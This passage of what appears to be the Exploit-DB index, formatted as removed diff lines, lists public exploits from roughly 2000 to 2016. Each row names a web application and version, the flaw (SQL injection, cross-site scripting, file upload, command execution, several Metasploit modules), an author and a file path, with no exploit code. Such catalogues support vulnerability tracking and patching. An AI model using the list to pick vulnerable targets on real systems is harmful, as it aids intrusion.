-19548,exploits/php/webapps/19548.txt,"gpEasy CMS Minishop 1.5 Plugin - Persistent Cross-Site Scripting",2012-07-03,"Carlos Mario Penagos Hollmann",php,webapps, -19549,exploits/php/webapps/19549.txt,"CLscript Classified Script 3.0 - SQL Injection",2012-07-03,"Daniel Godoy",php,webapps, -19550,exploits/php/webapps/19550.txt,"phpMyBackupPro 2.2 - Local File Inclusion",2012-07-03,dun,php,webapps, -19572,exploits/php/webapps/19572.txt,"WordPress Plugin MoodThingy Widget 0.8.7 - Blind SQL Injection",2012-07-04,"Chris Kellum",php,webapps, -19573,exploits/php/webapps/19573.php,"Tiki Wiki CMS Groupware 8.3 - 'Unserialize()' PHP Code Execution",2012-07-04,EgiX,php,webapps, -19574,exploits/php/webapps/19574.txt,"Webify Link Directory - SQL Injection",2012-07-04,"Daniel Godoy",php,webapps, -19597,exploits/php/webapps/19597.txt,"Guestbook Scripts PHP 1.5 - Multiple Vulnerabilities",2012-07-05,Vulnerability-Lab,php,webapps, -19598,exploits/php/webapps/19598.txt,"Freeside SelfService CGI/API 2.3.3 - Multiple Vulnerabilities",2012-07-05,Vulnerability-Lab,php,webapps, -19600,exploits/php/webapps/19600.txt,"CLscript CMS 3.0 - Multiple Vulnerabilities",2012-07-05,Vulnerability-Lab,php,webapps, -30094,exploits/php/webapps/30094.txt,"DGNews 2.1 - 'footer.php' Cross-Site Scripting",2007-05-28,"Jesper Jurcenoks",php,webapps, -19626,exploits/php/webapps/19626.txt,"sflog! 1.00 - Multiple Vulnerabilities",2012-07-06,dun,php,webapps, -19628,exploits/php/webapps/19628.txt,"Event Script PHP 1.1 CMS - Multiple Vulnerabilities",2012-07-06,Vulnerability-Lab,php,webapps, -19629,exploits/php/webapps/19629.txt,"Webmatic 3.1.1 - Blind SQL Injection",2012-07-06,"High-Tech Bridge SA",php,webapps, -19630,exploits/php/webapps/19630.rb,"Tiki Wiki CMS Groupware 8.3 - 'Unserialize()' PHP Code Execution (Metasploit)",2012-07-09,Metasploit,php,webapps, -19631,exploits/php/webapps/19631.rb,"Basilic 1.5.14 - 'diff.php' Arbitrary Command Execution (Metasploit)",2012-07-09,Metasploit,php,webapps, -19671,exploits/windows/webapps/19671.rb,"Umbraco CMS - Remote Command Execution (Metasploit)",2012-07-09,Metasploit,windows,webapps, -19715,exploits/php/webapps/19715.txt,"WordPress Plugin WP-Predict 1.0 - Blind SQL Injection",2012-07-10,"Chris Kellum",php,webapps, -19758,exploits/php/webapps/19758.rb,"Hastymail 2.1.1 RC1 - Command Injection (Metasploit)",2012-07-12,Metasploit,php,webapps, -19768,exploits/php/webapps/19768.txt,"House Style 0.1.2 - 'readfile()' Local File Disclosure",2012-07-12,GoLd_M,php,webapps, -19769,exploits/php/webapps/19769.txt,"eCan 0.1 - Local File Disclosure",2012-07-12,GoLd_M,php,webapps, -19771,exploits/php/webapps/19771.txt,"Lc Flickr Carousel 1.0 - Local File Disclosure",2012-07-12,GoLd_M,php,webapps, -19774,exploits/hardware/webapps/19774.txt,"TP-Link Gateway 3.12.4 - Multiple Vulnerabilities",2012-07-12,Vulnerability-Lab,hardware,webapps, -19775,exploits/php/webapps/19775.txt,"Reserve Logic 1.2 Booking CMS - Multiple Vulnerabilities",2012-07-12,Vulnerability-Lab,php,webapps, -19790,exploits/php/webapps/19790.txt,"webpagetest 2.6 - Multiple Vulnerabilities",2012-07-13,dun,php,webapps, -19791,exploits/php/webapps/19791.txt,"WordPress Plugin Resume Submissions & Job Postings 2.5.1 - Unrestricted Arbitrary File Upload",2012-07-13,"Chris Kellum",php,webapps, -19792,exploits/php/webapps/19792.txt,"Joomla! Component com_ksadvertiser - Remote File / Bypass Upload",2012-07-13,D4NB4R,php,webapps, -19825,exploits/php/webapps/19825.php,"Shopware 3.5 - SQL Injection",2012-07-14,Kataklysmos,php,webapps, -19964,exploits/php/webapps/19964.txt,"PHP-Nuke module (SPChat) - SQL Injection",2012-07-20,"Yakir Wizman",php,webapps, -19829,exploits/php/webapps/19829.txt,"Joomla! Component com_osproperty 2.0.2 - Unrestricted Arbitrary File Upload",2012-07-14,D4NB4R,php,webapps, -19859,exploits/hardware/webapps/19859.txt,"Vivotek Cameras - Sensitive Information Disclosure",2012-07-16,GothicX,hardware,webapps, -19862,exploits/php/webapps/19862.pl,"WordPress Theme Diary/Notebook Site5 - Email Spoofing",2012-07-16,bwall,php,webapps, -19863,exploits/php/webapps/19863.txt,"CakePHP 2.x < 2.2.0-RC2 - XML External Entity Injection",2012-07-16,"Pawel Wylecial",php,webapps, -19864,exploits/php/webapps/19864.txt,"VamCart CMS 0.9 - Multiple Vulnerabilities",2012-07-16,Vulnerability-Lab,php,webapps, -19865,exploits/php/webapps/19865.txt,"PBBoard CMS 2.1.4 - Multiple Vulnerabilities",2012-07-16,Vulnerability-Lab,php,webapps, -19898,exploits/php/webapps/19898.txt,"Forum Oxalis 0.1.2 - SQL Injection",2012-07-17,"Jean Pascal Pereira",php,webapps, -20010,exploits/php/webapps/20010.txt,"X-Cart Gold 4.5 - 'products_map.php?symb' Cross-Site Scripting",2012-07-21,muts,php,webapps, -19927,exploits/php/webapps/19927.html,"Nwahy Articles 2.2 - Cross-Site Request Forgery (Add Admin)",2012-07-18,DaOne,php,webapps, -19985,exploits/php/webapps/19985.txt,"iBoutique 4.0 - 'key' SQL Injection",2012-07-20,"SecPod Research",php,webapps, -20011,exploits/windows/webapps/20011.js,"SolarWinds Orion Network Performance Monitor 10.2.2 - Multiple Vulnerabilities",2012-07-21,muts,windows,webapps, -20029,exploits/php/webapps/20029.rb,"EGallery - Arbitrary '.PHP' File Upload (Metasploit)",2012-07-23,Metasploit,php,webapps, -20033,exploits/php/webapps/20033.py,"Dell SonicWALL Scrutinizer 9.0.1 - 'statusFilter.php?q' SQL Injection",2012-07-22,muts,php,webapps, -20035,exploits/asp/webapps/20035.js,"ipswitch whatsup gold 15.02 - Persistent Cross-Site Scripting / Blind SQL Injection / Remote Code Execution",2012-07-22,muts,asp,webapps, -20037,exploits/linux/webapps/20037.txt,"Atmail WebAdmin and Webmail Control Panel - SQL Root Password Disclosure",2012-07-23,Ciph3r,linux,webapps, -20038,exploits/linux/webapps/20038.py,"Symantec Web Gateway 5.0.2 - 'blocked.php?id' Blind SQL Injection",2012-07-23,muts,linux,webapps, -20044,exploits/php/webapps/20044.txt,"Symantec Web Gateway 5.0.3.18 - Blind SQL Injection Backdoor via MySQL Triggers",2012-07-23,muts,php,webapps, -20055,exploits/php/webapps/20055.txt,"MySQL Squid Access Report 2.1.4 - HTML Injection",2012-07-23,"Daniel Godoy",php,webapps, -20062,exploits/php/webapps/20062.py,"Alienvault Open Source SIEM (OSSIM) 3.1 - Reflected Cross-Site Scripting / Blind SQL Injection",2012-07-23,muts,php,webapps, -20063,exploits/windows/webapps/20063.txt,"SpiceWorks 5.3.75941 - Persistent Cross-Site Scripting / Authenticated SQL Injection",2012-07-23,dookie,windows,webapps, -20064,exploits/linux/webapps/20064.py,"Symantec Web Gateway 5.0.3.18 - Local/Remote File Inclusion / Remote Command Execution",2012-07-24,muts,linux,webapps, -20083,exploits/php/webapps/20083.txt,"WordPress Plugin Front End Upload 0.5.4.4 - Arbitrary '.PHP' File Upload",2012-07-24,"Chris Kellum",php,webapps, -20087,exploits/php/webapps/20087.py,"Zabbix 2.0.1 - Session Extractor",2012-07-24,muts,php,webapps, -20111,exploits/php/webapps/20111.rb,"CuteFlow 2.11.2 - Arbitrary File Upload (Metasploit)",2012-07-27,Metasploit,php,webapps, -20123,exploits/php/webapps/20123.py,"Symantec Web Gateway 5.0.3.18 - 'deptUploads_data.php?groupid' Blind SQL Injection",2012-07-30,Kc57,php,webapps, -20124,exploits/windows/webapps/20124.txt,"Dr. Web Control Center 6.00.3.201111300 - Cross-Site Scripting",2012-07-31,"Oliver Karow",windows,webapps, -20158,exploits/php/webapps/20158.txt,"PHP-Nuke 1.0/2.5 - Administrative Privileges",2000-08-21,bruj0,php,webapps, -20166,exploits/php/webapps/20166.txt,"Joomla! Component com_niceajaxpoll 1.3.0 - SQL Injection",2012-08-01,"Patrick de Brouwer",php,webapps, -20170,exploits/php/webapps/20170.txt,"Joomla! Component com_movm - SQL Injection",2012-08-01,D4NB4R,php,webapps, -20171,exploits/php/webapps/20171.txt,"ManageEngine Application Manager 10 - Multiple Vulnerabilities",2012-08-01,Vulnerability-Lab,php,webapps, -20172,exploits/php/webapps/20172.txt,"ManageEngine Mobile Application Manager 10 - SQL Injection",2012-08-01,Vulnerability-Lab,php,webapps, -20173,exploits/php/webapps/20173.rb,"WebPageTest - Arbitrary '.PHP' File Upload (Metasploit)",2012-08-02,Metasploit,php,webapps, -20197,exploits/php/webapps/20197.txt,"Joomla! Component com_joomgalaxy 1.2.0.4 - Multiple Vulnerabilities",2012-08-02,D4NB4R,php,webapps, -20198,exploits/php/webapps/20198.txt,"am4ss 1.2 - Multiple Vulnerabilities",2012-08-02,s3n4t00r,php,webapps, -20199,exploits/php/webapps/20199.php,"am4ss Support System 1.2 - PHP Code Injection",2012-08-02,i-Hmx,php,webapps, -20208,exploits/php/webapps/20208.txt,"nathan purciful phpphotoalbum 0.9.9 - Directory Traversal",2000-09-07,pestilence,php,webapps, -20260,exploits/php/webapps/20260.txt,"Islamnt Islam Forum Script 1.2 - Blind SQL Injection",2012-08-05,s3n4t00r,php,webapps, -20268,exploits/php/webapps/20268.txt,"Tickets CAD 2.20G - Multiple Vulnerabilities",2012-08-05,chap0,php,webapps, -20270,exploits/php/webapps/20270.txt,"WordPress Plugin Effective Lead Management 3.0.0 - Persistent Cross-Site Scripting",2012-08-05,"Chris Kellum",php,webapps, -20278,exploits/php/webapps/20278.txt,"phpix 1.0 - Directory Traversal",2000-10-07,Synnergy.net,php,webapps, -20320,exploits/windows/webapps/20320.txt,"Zoho BugTracker - Multiple Persistent Cross-Site Scripting Vulnerabilities",2012-08-07,LiquidWorm,windows,webapps, -40892,exploits/php/webapps/40892.txt,"Roundcube 1.2.2 - Remote Code Execution",2016-12-09,"Robin Peraglie",php,webapps,80 -20342,exploits/php/webapps/20342.php,"WespaJuris 3.0 - Multiple Vulnerabilities",2012-08-08,WhiteCollarGroup,php,webapps, -20343,exploits/php/webapps/20343.pl,"Joomla! Component com_enmasse 1.2.0.4 - SQL Injection",2012-08-08,D4NB4R,php,webapps, -20344,exploits/php/webapps/20344.php,"AraDown - Blind SQL Injection",2012-08-08,G-B,php,webapps, -20345,exploits/php/webapps/20345.txt,"iauto mobile Application 2012 - Multiple Vulnerabilities",2012-08-08,Vulnerability-Lab,php,webapps, -20346,exploits/php/webapps/20346.txt,"Inout Mobile Webmail APP - Persistent Cross-Site Scripting",2012-08-08,Vulnerability-Lab,php,webapps, -20347,exploits/php/webapps/20347.txt,"Openconstructor CMS 3.12.0 - 'id' Multiple SQL Injections",2012-08-08,"Lorenzo Cantoni",php,webapps, -20348,exploits/windows/webapps/20348.py,"Axigen Mail Server 8.0.1 - Persistent Cross-Site Scripting",2012-08-08,loneferret,windows,webapps, -20349,exploits/windows/webapps/20349.py,"emailarchitect enterprise email server 10.0 - Persistent Cross-Site Scripting",2012-08-08,loneferret,windows,webapps, -20350,exploits/windows/webapps/20350.py,"escon supportportal pro 3.0 - Persistent Cross-Site Scripting",2012-08-08,loneferret,windows,webapps, -20351,exploits/windows/webapps/20351.py,"mailenable enterprise 6.5 - Persistent Cross-Site Scripting",2012-08-08,loneferret,windows,webapps, -20352,exploits/windows/webapps/20352.py,"afterlogic mailsuite pro (VMware Appliance) 6.3 - Persistent Cross-Site Scripting",2012-08-08,loneferret,windows,webapps, -20353,exploits/windows/webapps/20353.py,"mailtraq 2.17.3.3150 - Persistent Cross-Site Scripting",2012-08-08,loneferret,windows,webapps, -20356,exploits/windows/webapps/20356.py,"ManageEngine ServiceDesk Plus 8.1 - Persistent Cross-Site Scripting",2012-08-08,loneferret,windows,webapps, -20357,exploits/windows/webapps/20357.py,"Alt-N MDaemon free 12.5.4 - Persistent Cross-Site Scripting",2012-08-08,loneferret,windows,webapps, -20358,exploits/php/webapps/20358.py,"WordPress Plugin mini mail Dashboard widget 1.42 - Persistent Cross-Site Scripting",2012-08-08,loneferret,php,webapps, -20359,exploits/windows/webapps/20359.py,"OTRS Open Technology Real Services 3.1.4 - Persistent Cross-Site Scripting",2012-08-08,loneferret,windows,webapps, -20360,exploits/php/webapps/20360.py,"WordPress Plugin postie 1.4.3 - Persistent Cross-Site Scripting",2012-08-08,loneferret,php,webapps, -20361,exploits/php/webapps/20361.py,"WordPress Plugin simplemail 1.0.6 - Persistent Cross-Site Scripting",2012-08-08,loneferret,php,webapps, -20362,exploits/windows/webapps/20362.py,"smartermail free 9.2 - Persistent Cross-Site Scripting",2012-08-08,loneferret,windows,webapps, -20363,exploits/windows/webapps/20363.py,"Surgemail 6.0a4 - Persistent Cross-Site Scripting",2012-08-08,loneferret,windows,webapps, -20364,exploits/php/webapps/20364.py,"T-dah Webmail Client 3.2.0-2.3 - Persistent Cross-Site Scripting",2012-08-08,loneferret,php,webapps, -20365,exploits/php/webapps/20365.py,"WordPress Plugin ThreeWP Email Reflector 1.13 - Persistent Cross-Site Scripting",2012-08-08,loneferret,php,webapps, -20366,exploits/windows/webapps/20366.py,"winwebmail server 3.8.1.6 - Persistent Cross-Site Scripting",2012-08-08,loneferret,windows,webapps, -20367,exploits/windows/webapps/20367.py,"xeams email server 4.4 build 5720 - Persistent Cross-Site Scripting",2012-08-08,loneferret,windows,webapps, -20368,exploits/windows/webapps/20368.py,"IBM Proventia Network Mail Security System 2.5 - POST File Read",2012-08-08,muts,windows,webapps, -20390,exploits/php/webapps/20390.txt,"Joomla! Component com_fireboard - SQL Injection",2012-08-09,Vulnerability-Lab,php,webapps, -20391,exploits/php/webapps/20391.php,"Kamads Classifieds 2.0 - Admin Hash Disclosure",2012-08-09,Mr.tro0oqy,php,webapps, -20393,exploits/windows/webapps/20393.py,"Cyclope Employee Surveillance Solution 6.0/6.1.0/6.2.0/6.2.1/6.3.0 - SQL Injection",2012-08-09,loneferret,windows,webapps, -20398,exploits/php/webapps/20398.txt,"MobileCartly 1.0 - Arbitrary File Deletion",2012-08-10,GoLd_M,php,webapps, -20416,exploits/php/webapps/20416.txt,"WordPress Plugin Mz-jajak 2.1 - SQL Injection",2012-08-10,StRoNiX,php,webapps, -20419,exploits/php/webapps/20419.txt,"Flynax General Classifieds CMS 4.0 - Multiple Vulnerabilities",2012-08-11,Vulnerability-Lab,php,webapps, -20421,exploits/php/webapps/20421.txt,"ProQuiz 2.0.2 - Multiple Vulnerabilities",2012-08-11,L0n3ly-H34rT,php,webapps, -20422,exploits/php/webapps/20422.txt,"MobileCartly 1.0 - Arbitrary File Write",2012-08-10,"Yakir Wizman",php,webapps, -20428,exploits/php/webapps/20428.txt,"Phorum 3.x - PHP Configuration Disclosure",2000-11-23,"Joao Gouveia",php,webapps, -20431,exploits/php/webapps/20431.txt,"Phorum 3.x - Arbitrary File Read",2000-11-24,"Joao Gouveia",php,webapps, -21316,exploits/php/webapps/21316.txt,"ASTPP VoIP Billing (4cf207a) - Multiple Vulnerabilities",2012-09-14,Vulnerability-Lab,php,webapps, -20474,exploits/php/webapps/20474.txt,"WordPress Plugin RSVPMaker 2.5.4 - Persistent Cross-Site Scripting",2012-08-13,"Chris Kellum",php,webapps, -20476,exploits/php/webapps/20476.txt,"Hotel Booking Portal 0.1 - Multiple Vulnerabilities",2012-08-13,"Yakir Wizman",php,webapps, -20477,exploits/windows/webapps/20477.txt,"IBM Websphere MQ File Transfer Edition Web Gateway - Cross-Site Request Forgery",2012-08-13,"Nir Valtman",windows,webapps, -20478,exploits/windows/webapps/20478.txt,"IBM Websphere MQ File Transfer Edition Web Gateway - Insufficient Access Control",2012-08-13,"Nir Valtman",windows,webapps, -20538,exploits/php/webapps/20538.txt,"Basilix Webmail 0.9.7 - Incorrect File Permissions",2001-01-11,"Tamer Sahin",php,webapps, -20539,exploits/php/webapps/20539.txt,"MobileCartly 1.0 - Arbitrary File Upload",2012-08-15,ICheer_No0M,php,webapps, -20706,exploits/linux/webapps/20706.rb,"Symantec Web Gateway 5.0.3.18 - Arbitrary Password Change (Metasploit)",2012-08-21,Kc57,linux,webapps, -20541,exploits/php/webapps/20541.txt,"MaxForum 1.0.0 - Local File Inclusion",2012-08-15,ahwak2000,php,webapps, -20704,exploits/php/webapps/20704.txt,"Clipbucket 2.5 - Directory Traversal",2012-08-21,loneferret,php,webapps, -20544,exploits/php/webapps/20544.txt,"xt:Commerce 3.04 SP2.1 - Blind SQL Injection",2012-08-15,stoffline.com,php,webapps, -20545,exploits/windows/webapps/20545.txt,"Cyclope Employee Surveillance Solution 6.0 6.1.0 6.2.0 - Multiple Vulnerabilities",2012-08-15,loneferret,windows,webapps, -20546,exploits/php/webapps/20546.txt,"sphpforum 0.4 - Multiple Vulnerabilities",2012-08-15,loneferret,php,webapps, -20549,exploits/php/webapps/20549.py,"Roundcube Webmail 0.8.0 - Persistent Cross-Site Scripting",2012-08-16,"Shai rod",php,webapps, -20550,exploits/php/webapps/20550.txt,"ProQuiz 2.0.2 - Cross-Site Request Forgery",2012-08-16,DaOne,php,webapps, -20573,exploits/php/webapps/20573.html,"Jaow CMS 2.3 - Cross-Site Request Forgery",2012-08-17,DaOne,php,webapps, -20574,exploits/php/webapps/20574.txt,"Social Engine 4.2.5 - Multiple Vulnerabilities",2012-08-17,Vulnerability-Lab,php,webapps, -20575,exploits/windows/webapps/20575.txt,"ManageEngine OpStor 7.4 - Multiple Vulnerabilities",2012-08-17,Vulnerability-Lab,windows,webapps, -20576,exploits/php/webapps/20576.txt,"Inferno vBShout 2.5.2 - SQL Injection",2012-08-17,Luit,php,webapps, -20578,exploits/php/webapps/20578.pl,"hastymail2 webmail 1.1 rc2 - Persistent Cross-Site Scripting",2012-08-17,"Shai rod",php,webapps, -20579,exploits/php/webapps/20579.py,"T-dah Webmail Client - Multiple Persistent Cross-Site Scripting Vulnerabilities",2012-08-17,"Shai rod",php,webapps, -20580,exploits/php/webapps/20580.txt,"webid 1.0.4 - Multiple Vulnerabilities",2012-08-17,dun,php,webapps, -20586,exploits/php/webapps/20586.txt,"Phorum 3.0.7 - 'admin.php3' Unverified Administrative Password Change",2000-01-06,"Max Vision",php,webapps, -20587,exploits/php/webapps/20587.txt,"Phorum 3.0.7 - 'violation.php3' Arbitrary Email Relay",2000-01-01,"Max Vision",php,webapps, -20588,exploits/php/webapps/20588.txt,"Phorum 3.0.7 - 'auth.php3' Backdoor Access",2000-01-06,"Max Vision",php,webapps, -20598,exploits/php/webapps/20598.txt,"Jaow CMS 2.3 - Blind SQL Injection",2012-08-17,loneferret,php,webapps, -20627,exploits/php/webapps/20627.py,"IlohaMail Webmail - Persistent Cross-Site Scripting",2012-08-18,"Shai rod",php,webapps, -20643,exploits/windows/webapps/20643.txt,"ManageEngine OpUtils 6.0 - Persistent Cross-Site Scripting",2012-08-18,loneferret,windows,webapps,7080 -20665,exploits/php/webapps/20665.txt,"T-dah Webmail - Cross-Site Request Forgery / Persistent Cross-Site Scripting",2012-08-20,"Yakir Wizman",php,webapps, -20666,exploits/php/webapps/20666.html,"Clipbucket 2.5 - Cross-Site Request Forgery",2012-08-20,DaOne,php,webapps, -20667,exploits/hardware/webapps/20667.txt,"Alpha Networks ADSL2/2+ Wireless Router ASL-26555 - Password Disclosure",2012-08-20,"Alberto Ortega",hardware,webapps, -20668,exploits/java/webapps/20668.py,"hupa webmail 0.0.2 - Persistent Cross-Site Scripting",2012-08-20,"Shai rod",java,webapps, -20669,exploits/php/webapps/20669.py,"GWebmail 0.7.3 - Cross-Site Scripting / Local File Inclusion / Remote Code Execution",2012-08-20,"Shai rod",php,webapps, -20709,exploits/php/webapps/20709.html,"OpenDocMan 1.2.6.1 - Cross-Site Request Forgery (Password Change)",2012-08-22,"Shai rod",php,webapps, -20710,exploits/php/webapps/20710.html,"VamCart 0.9 - Cross-Site Request Forgery",2012-08-22,DaOne,php,webapps, -20712,exploits/cgi/webapps/20712.rb,"E-Mail Security Virtual Appliance - 'learn-msg.cgi' Command Injection (Metasploit)",2012-08-22,Metasploit,cgi,webapps, -20671,exploits/php/webapps/20671.html,"PG Portal Pro - Cross-Site Request Forgery",2012-08-20,Noxious,php,webapps, -20672,exploits/php/webapps/20672.py,"Hivemail Webmail - Multiple Persistent Cross-Site Scripting Vulnerabilities",2012-08-20,"Shai rod",php,webapps, -20673,exploits/php/webapps/20673.txt,"YourArcadeScript 2.4 - 'index.php?id' SQL Injection",2012-08-20,DaOne,php,webapps, -20713,exploits/php/webapps/20713.rb,"XODA 0.4.5 - Arbitrary '.PHP' File Upload (Metasploit)",2012-08-22,Metasploit,php,webapps, -20675,exploits/php/webapps/20675.py,"uebimiau webmail 2.7.2 - Persistent Cross-Site Scripting",2012-08-20,"Shai rod",php,webapps, -20677,exploits/windows/webapps/20677.txt,"IOServer 1.0.18.0 - Directory Traversal",2012-08-20,hinge,windows,webapps, -20707,exploits/linux/webapps/20707.py,"Symantec Web Gateway 5.0.3.18 - Arbitrary Password Change",2012-08-21,Kc57,linux,webapps, -20708,exploits/php/webapps/20708.txt,"Clipbucket 2.5 - Blind SQL Injection",2012-08-21,loneferret,php,webapps, -20703,exploits/php/webapps/20703.txt,"XODA Document Management System 0.4.5 - Cross-Site Scripting / Arbitrary File Upload",2012-08-21,"Shai rod",php,webapps, -20729,exploits/php/webapps/20729.txt,"PHP-Nuke 1.0/2.5/3.0/4.x - Remote Ad Banner URL Change",2001-04-02,"Juan Diego",php,webapps, -20761,exploits/php/webapps/20761.txt,"Ad Manager Pro 4 - Local File Inclusion",2012-08-23,CorryL,php,webapps, -20762,exploits/php/webapps/20762.php,"webpa 1.1.0.1 - Multiple Vulnerabilities",2012-08-24,dun,php,webapps, -20759,exploits/php/webapps/20759.txt,"letodms 3.3.6 - Multiple Vulnerabilities",2012-08-23,"Shai rod",php,webapps, -20760,exploits/php/webapps/20760.txt,"op5 Monitoring 5.4.2 - VM Applicance Multiple Vulnerabilities",2012-08-23,loneferret,php,webapps, -40423,exploits/php/webapps/40423.txt,"Joomla! Component Event Booking 2.10.1 - SQL Injection",2016-09-26,"Persian Hack Team",php,webapps,80 -20785,exploits/php/webapps/20785.txt,"Ad Manager Pro - Multiple Vulnerabilities",2012-08-24,"Yakir Wizman",php,webapps, -20787,exploits/php/webapps/20787.txt,"Text Exchange Pro - 'index.php' Local File Inclusion",2012-08-24,"Yakir Wizman",php,webapps, -20788,exploits/php/webapps/20788.txt,"AB Banner Exchange - 'index.php' Local File Inclusion",2012-08-24,"Yakir Wizman",php,webapps, -20789,exploits/php/webapps/20789.txt,"Easy Banner Pro - 'index.php' Local File Inclusion",2012-08-24,"Yakir Wizman",php,webapps, -20790,exploits/php/webapps/20790.py,"businesswiki 2.5rc3 - Persistent Cross-Site Scripting / Arbitrary file upload",2012-08-24,"Shai rod",php,webapps, -20848,exploits/php/webapps/20848.txt,"PHPSlash 0.5.3 2/0.6.1 - URL Block Arbitrary File Disclosure",2001-04-15,"tobozo tagada",php,webapps, -20855,exploits/php/webapps/20855.txt,"Wiki Web Help 0.3.9 - Multiple Persistent Cross-Site Scripting Vulnerabilities",2012-08-27,"Shai rod",php,webapps, -20856,exploits/php/webapps/20856.txt,"XWiki 4.2-milestone-2 - Multiple Persistent Cross-Site Scripting Vulnerabilities",2012-08-27,"Shai rod",php,webapps, -20857,exploits/php/webapps/20857.txt,"web@all CMS 2.0 - Multiple Vulnerabilities",2012-08-27,LiquidWorm,php,webapps, -20859,exploits/php/webapps/20859.txt,"Vlinks 2.0.3 - 'id' SQL Injection",2012-08-27,JIKO,php,webapps, -20862,exploits/php/webapps/20862.txt,"WordPress Plugin Count Per Day 3.2.3 - Cross-Site Scripting",2012-08-27,Crim3R,php,webapps, -20863,exploits/php/webapps/20863.txt,"xt:Commerce VEYTON 4.0.15 - 'products_name_de' Script Insertion",2012-08-27,LiquidWorm,php,webapps, -20864,exploits/asp/webapps/20864.txt,"Elcom CMS 7.4.10 - Community Manager Insecure Arbitrary File Upload",2012-08-27,"Sense of Security",asp,webapps, -20866,exploits/php/webapps/20866.txt,"aoop CMS 0.3.6 - Multiple Vulnerabilities",2012-08-27,"Julien Ahrens",php,webapps, -20871,exploits/php/webapps/20871.txt,"CommPort 1.01 - Multiple Vulnerabilities",2012-08-28,"Jean Pascal Pereira",php,webapps, -20872,exploits/php/webapps/20872.txt,"mieric AddressBook 1.0 - SQL Injection",2012-08-28,"Jean Pascal Pereira",php,webapps, -20873,exploits/php/webapps/20873.html,"RV Article Publisher - Cross-Site Request Forgery",2012-08-28,DaOne,php,webapps, -20874,exploits/php/webapps/20874.html,"RV Shopping Cart - Cross-Site Request Forgery",2012-08-28,DaOne,php,webapps, -20877,exploits/hardware/webapps/20877.txt,"Conceptronic Grab'n'Go and Sitecom Storage Center - Password Disclosure",2012-08-28,"Mattijs van Ommeren",hardware,webapps, -20913,exploits/php/webapps/20913.txt,"Disqus Blog Comments - Blind SQL Injection",2012-08-29,Spy_w4r3,php,webapps, -20918,exploits/php/webapps/20918.txt,"WordPress Plugin HD Webplayer 1.1 - SQL Injection",2012-08-29,JoinSe7en,php,webapps, -20925,exploits/java/webapps/20925.txt,"SiteWare 2.5/3.0/3.1 Editor Desktop - Directory Traversal",2001-06-13,"Foundstone Labs",java,webapps, -20942,exploits/php/webapps/20942.html,"Booking System Pro - Cross-Site Request Forgery",2012-08-30,DaOne,php,webapps, -20956,exploits/php/webapps/20956.txt,"vBulletin Yet Another Awards System 4.0.2 - SQL Injection",2012-08-31,Backsl@sh/Dan,php,webapps, -20959,exploits/windows/webapps/20959.py,"OTRS Open Technology Real Services 3.1.8/3.1.9 - Cross-Site Scripting",2012-08-31,"Mike Eduard",windows,webapps, -20981,exploits/php/webapps/20981.txt,"SugarCRM Community Edition 6.5.2 (Build 8410) - Multiple Vulnerabilities",2012-09-01,"Brendan Coles",php,webapps, -20983,exploits/php/webapps/20983.pl,"Joomla! Component Spider Calendar - SQL Injection",2012-09-01,D4NB4R,php,webapps, -20987,exploits/asp/webapps/20987.txt,"Citrix Nfuse 1.51 - Webroot Disclosure",2001-07-02,sween,asp,webapps, -20995,exploits/php/webapps/20995.txt,"Cobalt Qube Webmail 1.0 - Directory Traversal",2001-07-05,kf,php,webapps, -20996,exploits/php/webapps/20996.txt,"Basilix Webmail 1.0 - File Disclosure",2001-07-06,"karol _",php,webapps, -21005,exploits/php/webapps/21005.txt,"Admidio 2.3.5 - Multiple Vulnerabilities",2012-09-02,"Stefan Schurtz",php,webapps, -21007,exploits/php/webapps/21007.txt,"AV Arcade Free Edition - 'add_rating.php?id' Blind SQL Injection",2012-09-02,DaOne,php,webapps, -21022,exploits/php/webapps/21022.txt,"PHPLib Team PHPLIB 7.2 - Remote Script Execution",2001-07-21,"giancarlo pinerolo",php,webapps, -21032,exploits/hardware/webapps/21032.txt,"Conceptronic Grab'n'Go Network Storage - Directory Traversal",2012-09-03,"Mattijs van Ommeren",hardware,webapps, -21033,exploits/hardware/webapps/21033.txt,"Sitecom Home Storage Center - Directory Traversal",2012-09-03,"Mattijs van Ommeren",hardware,webapps, -21038,exploits/php/webapps/21038.txt,"PHP-Nuke 5.0 - 'user.php' Form Element Substitution",2001-07-27,dinopio,php,webapps, -21046,exploits/php/webapps/21046.txt,"phpBB 1.4 - SQL Query Manipulation",2001-08-03,kill-9,php,webapps, -21833,exploits/php/webapps/21833.rb,"PhpTax - 'pfilez' Execution Remote Code Injection (Metasploit)",2012-10-10,Metasploit,php,webapps, -21052,exploits/jsp/webapps/21052.txt,"jira 4.4.3 / greenhopper < 5.9.8 - Multiple Vulnerabilities",2012-09-04,"Hoyt LLC Research",jsp,webapps, -21053,exploits/multiple/webapps/21053.txt,"Splunk 4.3.3 - Arbitrary File Read",2012-09-04,"Marcio Almeida",multiple,webapps, -21054,exploits/php/webapps/21054.txt,"Support4Arabs Pages 2.0 - SQL Injection",2012-09-04,L0n3ly-H34rT,php,webapps, -21056,exploits/php/webapps/21056.txt,"Group Office Calendar - '/calendar/json.php' SQL Injection",2012-09-04,"Chris Cooper",php,webapps, -21065,exploits/php/webapps/21065.pl,"phpBB 1.x - Page Header Arbitrary Command Execution",2001-07-31,UnderSpell,php,webapps, -21079,exploits/php/webapps/21079.rb,"MobileCartly 1.0 - Arbitrary File Creation (Metasploit)",2012-09-05,Metasploit,php,webapps, -21081,exploits/hardware/webapps/21081.txt,"QNAP Turbo NAS TS-1279U-RP - Multiple Path Injections",2012-09-05,"Andrea Fabrizi",hardware,webapps, -21082,exploits/multiple/webapps/21082.txt,"novell sentinel log manager 1.2.0.1 - Directory Traversal",2011-12-18,"Andrea Fabrizi",multiple,webapps, -21084,exploits/php/webapps/21084.txt,"ES Job Search Engine 3.0 - SQL Injection",2012-09-05,Vulnerability-Lab,php,webapps, -21085,exploits/asp/webapps/21085.txt,"Ektron CMS 8.5.0 - Multiple Vulnerabilities",2012-09-05,"Sense of Security",asp,webapps, -21119,exploits/php/webapps/21119.txt,"PostNuke 0.6 - Unauthenticated User Login",2001-10-13,anonymous,php,webapps, -21132,exploits/php/webapps/21132.txt,"Cannonbolt Portfolio Manager 1.0 - Multiple Vulnerabilities",2012-09-07,LiquidWorm,php,webapps, -21133,exploits/php/webapps/21133.txt,"Clipster Video - Persistent Cross-Site Scripting",2012-09-07,DaOne,php,webapps, -21134,exploits/hardware/webapps/21134.txt,"Sitecom Home Storage Center - Authentication Bypass",2012-09-07,"Mattijs van Ommeren",hardware,webapps, -21135,exploits/php/webapps/21135.txt,"TestLink 1.9.3 - Cross-Site Request Forgery",2012-09-07,"High-Tech Bridge 